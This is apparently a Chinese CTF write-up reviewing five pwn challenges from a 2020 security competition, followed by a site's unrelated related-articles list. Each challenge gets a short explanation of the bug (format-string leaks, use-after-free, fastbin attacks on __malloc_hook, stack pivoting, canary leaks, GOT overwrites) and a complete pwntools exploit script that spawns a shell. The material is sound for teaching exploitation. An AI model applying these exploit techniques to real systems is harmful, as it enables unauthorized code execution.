第一赛区

hacknote

  程序存在格式化字符串漏洞和uaf,不多说了,很简单。

 1 from pwn import *

 2

 3 p = process('./hacknote')

 4 elf = ELF('./hacknote')

 5 libc = ELF('./libc.so.6')

 6 context.log_level = 'debug'

 7 #by bhxdn

 8

 9 def duan():

10     gdb.attach(p)

11     pause()

12

13 def add(size,content):

14     p.sendlineafter('choice :','1')

15     p.sendlineafter('size :',str(size))

16     p.sendafter('Content :',content)

17

18 def delete(index):

19     p.sendlineafter('choice :','2')

20     p.sendlineafter('Index :',str(index))

21

22 def show(index):

23     p.sendlineafter('choice :','3')

24     p.sendlineafter('Index :',str(index))

25

26 #leak libc_base

27 p.sendafter('name!\n','%13$p')

28 p.recvuntil('hello ,')

29 libc_base = int(p.recv(14),16)-240-libc.symbols['__libc_start_main']

30 print 'libc_base-->' + hex(libc_base)

31 shell = libc_base + 0x45226

32

33 add(0x20,'aaaaaaaa')

34 add(0x20,'bbbbbbbb')

35 delete(0)

36 delete(1)

37 add(0x10,p64(shell))

38 show(0)

39 p.interactive()

heap

  同样是存在格式化字符串漏洞和uaf漏洞。

  说一下格式化字符串漏洞泄露libc吧。

  这里我直接看偏移为25的值。然后pwndbg看栈的情况,我直接stack 300看栈情况。然后放到文本中去找。

  25偏移下面那个箭头,所以__libc_start_main+240就是偏移19。所以就%19$p就可以leak libc版本和地址了。

  程序存在uaf漏洞,fastbins attack来攻击__malloc__hook,这里还需要利用realloc来调整一下栈帧来让one_gadget生效。

 1 from pwn import *

 2

 3 p = process('./heap')

 4 elf = ELF('./heap')

 5 libc = ELF('./libc.so.6')

 6 context.log_level = 'debug'

 7 #by bhxdn

 8

 9 def duan():

10     gdb.attach(p)

11     pause()

12

13 def add(size):

14     p.sendlineafter('choice: ','1')

15     p.sendlineafter('item: ',str(size))

16

17 def delete(index):

18     p.sendlineafter('choice: ','4')

19     p.sendlineafter('item: ',str(index))

20

21 def edit(index,content):

22     p.sendlineafter('choice: ','3')

23     p.sendlineafter('item: ',str(index))

24     p.sendafter('data: ',content)

25

26 def show(index):

27     p.sendlineafter('choice: ','2')

28     p.sendlineafter('item: ',str(index))

29

30

31 #leak libc_base

32 p.sendafter('name: ','%19$p')

33 p.recvuntil('Hello, ')

34 libc_base = int(p.recv(14),16)-240-libc.symbols['__libc_start_main']

35 print 'pianyi-->' + hex(libc.symbols['__libc_start_main'])

36 print 'libc_base-->' + hex(libc_base)

37 shell = libc_base + 0x4527a

38

39 add(0x20) #0

40 add(0x60) #1

41 delete(1)

42 edit(1,p64(libc_base+libc.symbols['__malloc_hook']-0x23))

43 add(0x60) #1 2

44 add(0x60) #attack

45 edit(3,'a'*(0x13-8)+p64(shell)+p64(libc_base+libc.symbols['realloc']+0xc))

46 add(0x60)

47 p.interactive()

第二赛区

stackstorm

  可以往堆写入两次数据(但似乎并没有什么用),可以栈溢出,但是只能溢出0x10字节。

  利用第一次溢出泄露栈地址,然后第二次在栈上布置rop,利用栈转移迁移到我们布置的rop链上,leak了libc地址,然后返回到main函数,直接将返回地址覆盖成one_gadget就可以了。

 1 from pwn import *

 2

 3 p = process('./stackstorm')

 4 elf = ELF('./stackstorm')

 5 libc = ELF('./libc.so.6')

 6 context.log_level = 'debug'

 7

 8 pop_rdi = 0x00400903

 9 leave_ret = 0x04007C1

10 buf = elf.bss()+0x100

11 main = 0x04007C3

12

13 p.sendafter('data1:\n','bhxdn')

14 payload = 'a'*(0x70-1)+'b'

15 p.sendafter('data2:\n',payload)

16 p.recvuntil('b')

17 stack_addr = u64(p.recv(6).ljust(8,'\x00'))

18 print 'stack_addr-->' + hex(stack_addr)

19

20 p.sendafter('data1:\n','bhxdn')

21 payload = 'aaaaaaaa' + p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(main)+p64(0)*9+p64(stack_addr-0x20-0x70)+p64(leave_ret)

22 p.sendafter('data2:\n',payload)

23 p.recv(12)

24 libc_base = u64(p.recv(6).ljust(8,'\x00'))-libc.symbols['puts']

25 print 'libc_base-->'+hex(libc_base)

26 shell = libc_base+0x4527a

27

28 payload = 'a'*0x70+'bbbbbbbb'+p64(shell)

29 p.send('bhxdn')

30 p.sendafter('data2:\n',payload)

31 p.interactive()

第三赛区

待更新

第四赛区

namepie

  程序本身有system("/bin/sh"),两个输入,可以利用第一个输入leak canary。

  图片可以看到rbp下面是程序本身的地址。开启pie 的程序,后三位是不会变的,所以只覆盖最后一个字节,覆盖成shell的字节,就拿到shell了。

exp:

 1 from pwn import *

 2

 3 elf = ELF('./namepie')

 4 context.log_level = 'debug'

 5

 6 shell = 0x000A71

 7

 8 p = process('./namepie')

 9 p.recvuntil('Name:\n')

10 p.send('a'*0x28+'b')

11 p.recvuntil('b')

12 canary = u64(p.recv(7).rjust(8,'\x00'))

13 print 'canary-->' + hex(canary)

14 p.recv()

15 p.send('a'*0x28+p64(canary)+'bbbbbbbb'+'\x71')

16 p.sendline('ls')

17 p.recvuntil('namepie')

18 p.interactive()

onetime

  是一道菜单堆题。调试的时候发现bss段上有7f。

  存在uaf,先malloc一个chunk,再free掉,修改fd为bss段上的地址。然后再申请两次申请回来。这时候就可以控制bss上的数据,并且有一个可以读写的指针。

  将指针指向malloc_got,泄露libc地址,然后修改malloc_got为one_gadget的地址,再执行malloc就拿到shell了。

 1 from pwn import *

 2

 3 p = process('./pwn')

 4 elf = ELF('./pwn')

 5 libc = ELF('./libc.so.6')

 6 context.log_level = 'debug'

 7

 8 def duan():

 9     gdb.attach(p)

10     pause()

11

12 def add():

13     p.sendlineafter('choice >>\n','1')

14

15 def edit(content):

16     p.sendlineafter('choice >>\n','2')

17     p.sendafter('content:',content)

18

19 def show():

20     p.sendlineafter('choice >>\n','3')

21

22 def delete():

23     p.sendlineafter('choice >>\n','4')

24

25 def gift(content):

26     p.sendlineafter('choice >>\n','5')

27     p.sendafter('name:',content)

28

29 attack_addr = 0x0006020BC-0x2f

30 #x/32gx 0x0006020BC-0x24

31 add()

32 delete()

33 edit(p64(attack_addr))

34 add()

35 gift('a'*11+p64(elf.got['malloc'])+p32(100)+p32(100)+p32(100)+p32(100))

36

37 show()

38 libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - libc.symbols['malloc']

39 print 'libc_base-->' + hex(libc_base)

40 shell = libc_base + 0x45226

41

42

43 edit(p64(shell))

44 add()

45 p.interactive()

2020信息安全铁人三项 pwn复盘的更多相关文章

  1. [BUUCTF]PWN——铁人三项(第五赛区)_2018_rop

    铁人三项(第五赛区)_2018_rop[32位libc泄露] 题目附件 解题步骤: 例行检查,32位,开启了NX保护 试运行一下程序,一开始让我们输入,然后直接输出"Hellow,world ...

  2. 铁人三项(第五赛区)_2018_seven

    铁人三项(第五赛区)_2018_seven 先来看看保护 保护全开,IDA分析 首先申请了mmap两个随机地址的空间,一个为rwx,一个为rw 读入的都shellcode长度小于等于7,且这7个字符不 ...

  3. 网站SEO之百度优化不得不知的铁人三项规则

    奥运会有铁人三项,此运动更好的协调了运动员的综合素质水平,而百度优化排名中的“铁人三项”规则则是让网站的整体质量更好的满足市场用户体验.针对不同部分的操作,可以让网站在每个细节处都能凸显以人为本的服务 ...

  4. Phaser铁人三项

    /** * 模拟铁人三项 */ public class PhaserTest { private static Random random = new Random(System.currentTi ...

  5. 2018铁人三项测评题 IOS99

    下面这一部分是我从网上复制过来的, 2.IOS 解题链接:http://ctf4.shiyanbar.com/web/IOS/index.php 这题页面中提示系统升级到了IOS99,我们可以想到修改 ...

  6. 铁人三项(第五赛区)_2018_rop

    拿到程序依旧老样子checksec和file一下 可以看到是32位的程序开启了nx保护,将程序放入ida进行查看 shift+f12 看到没有system和binsh等字样,考虑用泄露libc来做这道 ...

  7. 计算几何-LA2218-HPI-第一次卡精度-vijos1087-铁人三项

    This article is made by Jason-Cow.Welcome to reprint.But please post the writer's address. http://ww ...

  8. 【BZOJ】【2765】【JLOI2010】铁人双项比赛

    计算几何/半平面交 本来我是想去写POJ 1755的,然后想起了这道跟它很像的题,但应该是弱化版,所以就先写了这个…… 我们可以发现每个人的总用时,与k是呈一次函数关系的:$time_i=\frac{ ...

  9. 【APIO2018】铁人两项(圆方树,动态规划)

    [APIO2018]铁人两项(圆方树,动态规划) 题面 UOJ 洛谷 BZOJ 题解 嘤嘤嘤,APIO的时候把一个组合数写成阶乘了,然后这题的70多分没拿到 首先一棵树是很容易做的,随意指定起点终点就 ...

随机推荐

  1. C#练习3

    using System; class Test { static void F(params int[]args) { Console.WriteLine("# of argument:{ ...

  2. [bzoj3170]松鼠聚会

    这个距离就是切比雪夫距离,有一个神奇的东西是说将(x,y)变成(x+y,x-y),然后就是曼哈顿距离,因此转化后对x坐标和y坐标分别统计排序和求和(求前缀和预处理+二分) 1 #include< ...

  3. C/C++ Qt 选择夹TabWidget组件应用

    在Qt中通过使用选择夹组件可以实现在一个页面中集成多种功能,我们以TabWidget选择夹组件为例,实现在单个页面中集成多个功能,并给每一个子夹增加对应的Ico图标. 如果我们使用选择夹组件,必须提前 ...

  4. 打开order by的大门,一探究竟《死磕MySQL系列 十二》

    在日常开发工作中,你一定会经常遇到要根据指定字段进行排序的需求. 这时,你的SQL语句类似这样. select id,phone,code from evt_sms where phone like  ...

  5. Java培训班学员如何找工作?如何过试用期?

    在本文里,首先将结合我了解的多家培训班辅导学员就业的情况,来讲讲培训班学员如何高效找工作.由于本人在周末会兼职在培训班讲课,也帮助过不少学员成功入职,所以下文还会给出"培训班学员如何快速适应 ...

  6. Markdown 目录

    Markdown 目录 1. TOC TOC 全称为 Table of Content,自动列出全部标题. 用法: [toc] 在 Markdown 中,自动生成目录非常简单,只需要在恰当的位置添加 ...

  7. 【R】write.table输出数据带有行名?

    目录 问题 解决一 解决二 问题 这个问题应该很常见吧.R中输出数据框时,想要把行名和列名都输出.如果直接输出的话,输出的结果列名会往前移动一位,这显然不是我们想要的. 直接上例子: > a = ...

  8. shell 脚本自动插入文件头

    vim编辑shell脚本自动插入文件头部信息,将下面的代码写入home目录xia .vimrc 文件即可. shell 文件头: 1 autocmd BufNewFile *.sh exec &quo ...

  9. 【Python小试】统计一条核酸序列中频数非0或为2的双核苷酸

    概念 双核苷酸由任意2个碱基组成 测试1 dna = "AATGATGAACGAC" #一一列举 dinucleotides = ['AA','AT','AG','AC', 'TA ...

  10. 7. Minimum Depth of Binary Tree-LeetCode

    难度系数:easy /** * Definition for a binary tree node. * struct TreeNode { * int val; * TreeNode *left; ...